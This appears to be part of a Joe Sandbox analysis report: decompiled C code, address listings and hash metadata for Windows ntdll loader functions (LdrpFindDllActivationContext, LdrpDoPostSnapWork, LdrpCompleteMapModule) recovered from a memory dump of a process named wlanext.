                                  0x0350a28d
                                  0x0350a294
                                  0x03551cc1
                                  0x0350a29a
                                  0x0350a29a
                                  0x0350a29a
                                  0x0350a29f
                                  0x03551ccb
                                  0x03551cd1
                                  0x03551cd8
                                  0x03551cea
                                  0x03551cea
                                  0x03551cd8
                                  0x0350a2a9
                                  0x0350a2af
                                  0x0350a2bc
                                  0x03551cfd
                                  0x0350a2c2
                                  0x0350a2c2
                                  0x0350a2c2
                                  0x0350a2c7
                                  0x03551d07
                                  0x03551d0d
                                  0x03551d14
                                  0x03551d1f
                                  0x03551d21
                                  0x03551d2c
                                  0x03551d2c
                                  0x03551d2c
                                  0x03551d47
                                  0x03551d47
                                  0x03551d14
                                  0x0350a2cd
                                  0x0350a2d2
                                  0x0350a2d9
                                  0x03551d5a
                                  0x0350a2df
                                  0x0350a2df
                                  0x0350a2df
                                  0x0350a2e4
                                  0x03551d69
                                  0x03551d6b
                                  0x03551d76
                                  0x03551d76
                                  0x03551d76
                                  0x03551d91
                                  0x03551d91
                                  0x0350a2ea
                                  0x0350a2f0
                                  0x0350a2f5
                                  0x03551da8
                                  0x03551dad
                                  0x03551dad
                                  0x0350a2fd
                                  0x0350a300
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                  • API String ID: 2994545307-2586055223
                                  • Opcode ID: cb2fd2e6cd5ebc382a9af04640e609077699d1a3402923c04fab1c8f5b834794
                                  • Instruction ID: 0627860021eeeee7fa6298d0540233bca82a93e8182aee2dc519ce4c4c15defd
                                  • Opcode Fuzzy Hash: cb2fd2e6cd5ebc382a9af04640e609077699d1a3402923c04fab1c8f5b834794
                                  • Instruction Fuzzy Hash: C451F432205B819FD711DB68E855F67BBF8FB84750F090869F8518B2E1D726E900CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03518E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 44%
                                  			E03518E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x35dd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x35d8464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x35d5780 & 0x00000003) != 0) {
							E03565510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x35d5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0352B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x35d7984; // 0xb42ac8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x35d8464; // 0x73b80110
					 *0x35db1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E03519B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x35d5780 & 0x00000005) != 0) {
						_push(_t49);
						E03565510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                  0x03518e0f
                                  0x03518e16
                                  0x03518e19
                                  0x03518e1b
                                  0x03518e21
                                  0x03518e7f
                                  0x03518e85
                                  0x03559354
                                  0x0355936c
                                  0x03559371
                                  0x0355937b
                                  0x03559381
                                  0x03559381
                                  0x0355937b
                                  0x03518e9d
                                  0x03518e9d
                                  0x03518e29
                                  0x03518e2c
                                  0x03518e38
                                  0x03518e3e
                                  0x03518e43
                                  0x03518eb5
                                  0x03518eb9
                                  0x035592aa
                                  0x035592af
                                  0x035592e8
                                  0x035592e8
                                  0x035592af
                                  0x03518eb9
                                  0x03518e45
                                  0x03518e53
                                  0x03518e5b
                                  0x03518e5f
                                  0x03518e78
                                  0x03518e78
                                  0x03518e7d
                                  0x03518ec3
                                  0x03518ecd
                                  0x03518ed2
                                  0x03518ed2
                                  0x03518ec5
                                  0x03518ec5
                                  0x00000000
                                  0x03518e7d
                                  0x03518e67
                                  0x03518ea4
                                  0x0355931a
                                  0x00000000
                                  0x00000000
                                  0x03559320
                                  0x03518ea4
                                  0x03518e70
                                  0x03559325
                                  0x03559340
                                  0x03559345
                                  0x03559345
                                  0x03518e76
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Strings
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 03559357
                                  • LdrpFindDllActivationContext, xrefs: 03559331, 0355935D
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 0355933B, 03559367
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0355932A
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 0-3779518884
                                  • Opcode ID: 52934199b63ee1d12e3466bf7f5dc272b3a34f98d555961fe8f1856b6dd0744b
                                  • Instruction ID: d226afe7c6690d559e15b503757361318e24eda8aba20b9952b20fff88647c9e
                                  • Opcode Fuzzy Hash: 52934199b63ee1d12e3466bf7f5dc272b3a34f98d555961fe8f1856b6dd0744b
                                  • Instruction Fuzzy Hash: B7411722A003119EFF70FA14B849F79B7B9BB01244F0E476AE80497571E7706CA0C2C3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035A49A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                  • API String ID: 2994545307-336120773
                                  • Opcode ID: a970379b19557ee2d0786b3607cb9990a6c3bdac9a79477586574db6c14506fd
                                  • Instruction ID: 685bca35fd2c1769b1f3a9b92f11063227c00e92a140c358653acc0d42630ecc
                                  • Opcode Fuzzy Hash: a970379b19557ee2d0786b3607cb9990a6c3bdac9a79477586574db6c14506fd
                                  • Instruction Fuzzy Hash: 4B312579210610EFC350DB9EE887F6EB3E9FF00660F28845AF8068F361D6B0A840D659
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034F8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E034F8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E034F934A() != 0) {
								_t159 = E0356A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x35d5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E03565510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x35d5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E034F849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E034F8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E034F8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x35d5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x35d5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E03502280(_t92, 0x35d86cc);
															_t94 = E035B9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E035161A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x35d5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E034F8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x35d5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x35d5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0352F380(_t136, 0x34c1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E03502280(_t108, 0x35d86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E035161A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E035B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E034FFFB0(_t118, _t156, 0x35d86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03529A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                  0x034f8799
                                  0x034f879d
                                  0x034f87a1
                                  0x034f87a3
                                  0x034f87a8
                                  0x034f87c3
                                  0x034f87c3
                                  0x034f87c8
                                  0x034f87d1
                                  0x034f87d4
                                  0x034f87d8
                                  0x034f87e5
                                  0x034f87ec
                                  0x03549bfe
                                  0x03549c00
                                  0x03549c02
                                  0x03549c08
                                  0x03549c0d
                                  0x03549c0f
                                  0x03549c14
                                  0x03549c2d
                                  0x03549c32
                                  0x03549c37
                                  0x03549c3a
                                  0x03549c3c
                                  0x03549c42
                                  0x03549c42
                                  0x03549c3c
                                  0x03549c02
                                  0x034f87da
                                  0x034f87df
                                  0x034f87e3
                                  0x00000000
                                  0x00000000
                                  0x034f87e3
                                  0x034f87f2
                                  0x00000000
                                  0x034f87fb
                                  0x034f87fd
                                  0x034f87fe
                                  0x034f880e
                                  0x034f880f
                                  0x034f8810
                                  0x034f8814
                                  0x034f881a
                                  0x034f881c
                                  0x034f881f
                                  0x034f8821
                                  0x034f8822
                                  0x034f8824
                                  0x034f8826
                                  0x034f882c
                                  0x034f882e
                                  0x03549c48
                                  0x03549c48
                                  0x034f8834
                                  0x034f8834
                                  0x034f8837
                                  0x00000000
                                  0x00000000
                                  0x034f8837
                                  0x034f882e
                                  0x034f883d
                                  0x034f8840
                                  0x034f8843
                                  0x034f8846
                                  0x034f8849
                                  0x034f884c
                                  0x034f884e
                                  0x034f8850
                                  0x034f8852
                                  0x034f8854
                                  0x034f8857
                                  0x034f88b4
                                  0x034f88b6
                                  0x034f88b6
                                  0x034f8859
                                  0x034f8859
                                  0x034f8859
                                  0x034f8861
                                  0x034f8866
                                  0x034f886a
                                  0x034f893d
                                  0x034f8941
                                  0x00000000
                                  0x034f8947
                                  0x034f8947
                                  0x034f894a
                                  0x034f894c
                                  0x00000000
                                  0x034f8952
                                  0x034f8955
                                  0x034f895a
                                  0x034f895d
                                  0x034f895d
                                  0x034f895f
                                  0x034f8961
                                  0x034f8961
                                  0x034f8968
                                  0x00000000
                                  0x00000000
                                  0x034f896a
                                  0x034f896b
                                  0x034f896e
                                  0x00000000
                                  0x034f8970
                                  0x034f8970
                                  0x034f8970
                                  0x034f8970
                                  0x034f8972
                                  0x034f8972
                                  0x034f8974
                                  0x00000000
                                  0x034f897a
                                  0x034f897a
                                  0x034f897d
                                  0x00000000
                                  0x034f8983
                                  0x03549c65
                                  0x03549c6d
                                  0x03549c72
                                  0x03549c75
                                  0x03549c75
                                  0x03549c82
                                  0x03549c86
                                  0x03549c87
                                  0x03549c88
                                  0x03549c89
                                  0x03549c8c
                                  0x03549c90
                                  0x03549c95
                                  0x03549c97
                                  0x03549ca0
                                  0x03549ca3
                                  0x03549ca9
                                  0x03549ca9
                                  0x00000000
                                  0x03549ca9
                                  0x03549ca3
                                  0x00000000
                                  0x03549c97
                                  0x034f897d
                                  0x00000000
                                  0x034f8974
                                  0x034f8988
                                  0x034f8992
                                  0x034f8996
                                  0x00000000
                                  0x034f8996
                                  0x034f894c
                                  0x00000000
                                  0x034f8870
                                  0x034f887b
                                  0x034f887d
                                  0x034f887f
                                  0x034f8881
                                  0x034f8884
                                  0x034f8884
                                  0x034f8886
                                  0x034f8889
                                  0x034f888c
                                  0x034f888e
                                  0x034f8891
                                  0x034f8891
                                  0x034f8898
                                  0x00000000
                                  0x00000000
                                  0x034f889a
                                  0x034f889b
                                  0x034f889e
                                  0x00000000
                                  0x00000000
                                  0x034f88a0
                                  0x034f88a8
                                  0x034f88b0
                                  0x034f88b2
                                  0x034f88d3
                                  0x034f88d5
                                  0x00000000
                                  0x034f88d7
                                  0x034f88db
                                  0x034f88dc
                                  0x034f88e0
                                  0x034f88e8
                                  0x034f88ee
                                  0x034f88f0
                                  0x034f88f3
                                  0x034f88fc
                                  0x034f8901
                                  0x034f8906
                                  0x034f890c
                                  0x034f890c
                                  0x034f890f
                                  0x034f8916
                                  0x034f8917
                                  0x034f8918
                                  0x034f8919
                                  0x034f891a
                                  0x034f891f
                                  0x034f8921
                                  0x03549c52
                                  0x03549c55
                                  0x03549c5b
                                  0x03549cac
                                  0x03549cc0
                                  0x03549cc0
                                  0x03549c55
                                  0x034f8927
                                  0x034f8927
                                  0x034f892f
                                  0x034f8933
                                  0x00000000
                                  0x034f88f5
                                  0x034f88f5
                                  0x00000000
                                  0x034f88f7
                                  0x034f88f7
                                  0x034f88fa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034f88fa
                                  0x034f88f5
                                  0x034f88f3
                                  0x00000000
                                  0x034f88d5
                                  0x00000000
                                  0x034f88b2
                                  0x034f88c9
                                  0x00000000
                                  0x034f88c9
                                  0x034f887f
                                  0x034f886a
                                  0x034f8857
                                  0x034f8852
                                  0x034f88bf
                                  0x034f88bf
                                  0x034f87aa
                                  0x034f87ad
                                  0x034f87ae
                                  0x034f87b4
                                  0x034f87b5
                                  0x034f87b6
                                  0x034f87b8
                                  0x034f87bd
                                  0x034f87c1
                                  0x034f87f4
                                  0x034f87fa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034f87c1
                                  0x00000000

                                  Strings
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 03549C28
                                  • LdrpDoPostSnapWork, xrefs: 03549C1E
                                  • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03549C18
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 0-1948996284
                                  • Opcode ID: 825be478f69044d9f251e05e8c458be845d23c4a88f353cc0ae17121ce8dac2e
                                  • Instruction ID: 44d14b02a97f7fd226c5f346438ff442716aa7418643fe78f9fd278ee15db2c8
                                  • Opcode Fuzzy Hash: 825be478f69044d9f251e05e8c458be845d23c4a88f353cc0ae17121ce8dac2e
                                  • Instruction Fuzzy Hash: 67910575A002169FDB18DF59D881ABAB7B5FF85314B1C40AADA01AF261E730E905CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034F7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E034F7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E034FCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E034EC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x35d5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E03565510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x35d5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E03507D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03507D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E03567016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E03507D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03507D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E03567016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0351A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E034EB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                  0x034f7e4c
                                  0x034f7e50
                                  0x034f7e55
                                  0x034f7e58
                                  0x034f7e5d
                                  0x034f7e71
                                  0x034f7f33
                                  0x034f7e77
                                  0x034f7e77
                                  0x034f7e79
                                  0x034f7e79
                                  0x034f7e7e
                                  0x034f7f45
                                  0x03549848
                                  0x00000000
                                  0x03549848
                                  0x034f7f4e
                                  0x034f7f53
                                  0x034f7f5a
                                  0x00000000
                                  0x00000000
                                  0x0354985a
                                  0x03549862
                                  0x03549866
                                  0x00000000
                                  0x0354986c
                                  0x00000000
                                  0x0354986c
                                  0x034f7e84
                                  0x034f7e84
                                  0x034f7e8d
                                  0x03549871
                                  0x034f7eb8
                                  0x034f7ec0
                                  0x034f7ec0
                                  0x034f7e9a
                                  0x0354987e
                                  0x00000000
                                  0x00000000
                                  0x03549884
                                  0x0354988b
                                  0x035498a7
                                  0x035498ac
                                  0x035498b1
                                  0x035498b6
                                  0x035498b8
                                  0x035498b8
                                  0x035498b9
                                  0x00000000
                                  0x035498b9
                                  0x034f7ea0
                                  0x034f7ea7
                                  0x00000000
                                  0x00000000
                                  0x034f7eac
                                  0x034f7eb1
                                  0x034f7ec6
                                  0x034f7ed0
                                  0x035498cc
                                  0x034f7ed6
                                  0x034f7ed6
                                  0x034f7ed6
                                  0x034f7ede
                                  0x034f7ee3
                                  0x035498e3
                                  0x035498f0
                                  0x03549902
                                  0x035498f2
                                  0x035498fb
                                  0x035498fb
                                  0x03549907
                                  0x0354991d
                                  0x0354991d
                                  0x03549907
                                  0x035498e3
                                  0x034f7ef0
                                  0x034f7f14
                                  0x034f7f14
                                  0x034f7f1e
                                  0x03549946
                                  0x034f7f24
                                  0x034f7f24
                                  0x034f7f24
                                  0x034f7f2c
                                  0x0354996a
                                  0x03549975
                                  0x03549975
                                  0x0354997e
                                  0x03549993
                                  0x03549993
                                  0x0354997e
                                  0x00000000
                                  0x034f7ef2
                                  0x034f7efc
                                  0x034f7f0a
                                  0x034f7f0e
                                  0x03549933
                                  0x00000000
                                  0x03549933
